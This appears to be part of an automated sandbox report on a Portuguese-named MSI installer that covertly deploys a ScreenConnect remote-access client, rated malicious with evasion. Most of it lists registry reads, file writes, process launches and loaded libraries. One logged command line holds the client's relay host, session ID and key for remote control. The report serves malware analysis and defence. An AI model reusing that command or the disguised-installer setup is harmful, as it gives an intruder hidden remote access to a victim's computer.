Reads the Security eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior

Reads the System eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect	Jump to behavior

Contains functionality to launch a process as a different user

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Code function: 6_2_05F32280 CreateProcessAsUserW,

6_2_05F32280

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4c1432.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{87BA6F17-ED48-2213-B0B4-DE77D334918D}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI15E7.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1608.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI17AE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4c1434.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4c1434.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{87BA6F17-ED48-2213-B0B4-DE77D334918D}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{87BA6F17-ED48-2213-B0B4-DE77D334918D}\DefaultIcon	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Windows\Installer\wix{87BA6F17-ED48-2213-B0B4-DE77D334918D}.SchedServiceConfig.rmi	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\cksz2bob.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\cksz2bob.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\blegu5ad.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\blegu5ad.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\0hs00sh4.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\0hs00sh4.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\hfe01imn.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\hfe01imn.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\jfhfu5lw.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\jfhfu5lw.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\3mrf34qd.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\3mrf34qd.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\rs24xzl1.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\rs24xzl1.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\1ot0kljn.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\1ot0kljn.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\qf3laj4y.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\qf3laj4y.newcfg	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI1608.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_057285B0	6_2_057285B0
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572A6F8	6_2_0572A6F8
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_0572A6F8	6_2_0572A6F8
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05F30040	6_2_05F30040
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Code function: 6_2_05F30040	6_2_05F30040
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B412302	7_2_00007FFD9B412302
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B40703D	7_2_00007FFD9B40703D
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71701B	7_2_00007FFD9B71701B
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71901C	7_2_00007FFD9B71901C
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B710428	7_2_00007FFD9B710428
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7236BD	7_2_00007FFD9B7236BD
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B716961	7_2_00007FFD9B716961
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7213E0	7_2_00007FFD9B7213E0
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B71AEFD	7_2_00007FFD9B71AEFD
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B72131C	7_2_00007FFD9B72131C
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Code function: 7_2_00007FFD9B7209F2	7_2_00007FFD9B7209F2

Sample file is different than original file name gathered from version info

Source: INSPECAO-B01S.msi	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs INSPECAO-B01S.msi
Source: INSPECAO-B01S.msi	Binary or memory string: OriginalFilenameSfxCA.dllL vs INSPECAO-B01S.msi
Source: INSPECAO-B01S.msi	Binary or memory string: OriginalFilenamewixca.dll\ vs INSPECAO-B01S.msi

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal72.evad.winMSI@15/71@3/2

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Source: INSPECAO-B01S.msi

Static file information: TRID: Microsoft Windows Installer (60509/1) 57.88%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\INSPECAO-B01S.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3B0D9CA4E13447273575F5AF2A2A458A C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBC6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4983906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9498291156A768CDF30C7CBD1AD63E0B
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A9BFA3C15C3C22AD10EB69C2707C2272 E Global\MSI0000
Source: unknown	Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-xkznvd-relay.screenconnect.com&p=443&s=e3b17808-f02f-4082-a0ad-0ef89097505d&k=BgIAAACkAABSU0ExAAgAAAEAAQBhw2Nfb6ZuPKlEDIhhDVtAYuyd858SiHfXVlo7oudUHFIakFl%2fPS5vluFfI688c%2ffI5cXvCjgFShXpqsjscRe%2bvZHKSRm%2bteuE97Q6NBZ5oegi61HDzK9%2bJY6drnQvjn5O3W4R13ZtTHxRqVi92KIEihsQur1J2%2fL4Cjo7mR%2bTf3z2FvvhBA9AI44ir3hX7T6YCeKwSXIGWSjwulU6qmSUa0YOa6ak5ubRKh%2fug0gS3wbeTgSuaLTj1hdcHea2xRvqMqyIWF1MOawExDdmH4KtYMuNWGxsLao6ChTQtObulDnOQ2rzUTbk681GAIKtEvzer9DayT7dfK5gHsogR7Cx&c=envioparaiba20%2f10&c=&c=&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe" "RunRole" "fedb95f0-928e-4923-97ab-510c95cfca5c" "User"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3B0D9CA4E13447273575F5AF2A2A458A C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9498291156A768CDF30C7CBD1AD63E0B	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A9BFA3C15C3C22AD10EB69C2707C2272 E Global\MSI0000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBC6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4983906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe" "RunRole" "fedb95f0-928e-4923-97ab-510c95cfca5c" "User"	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
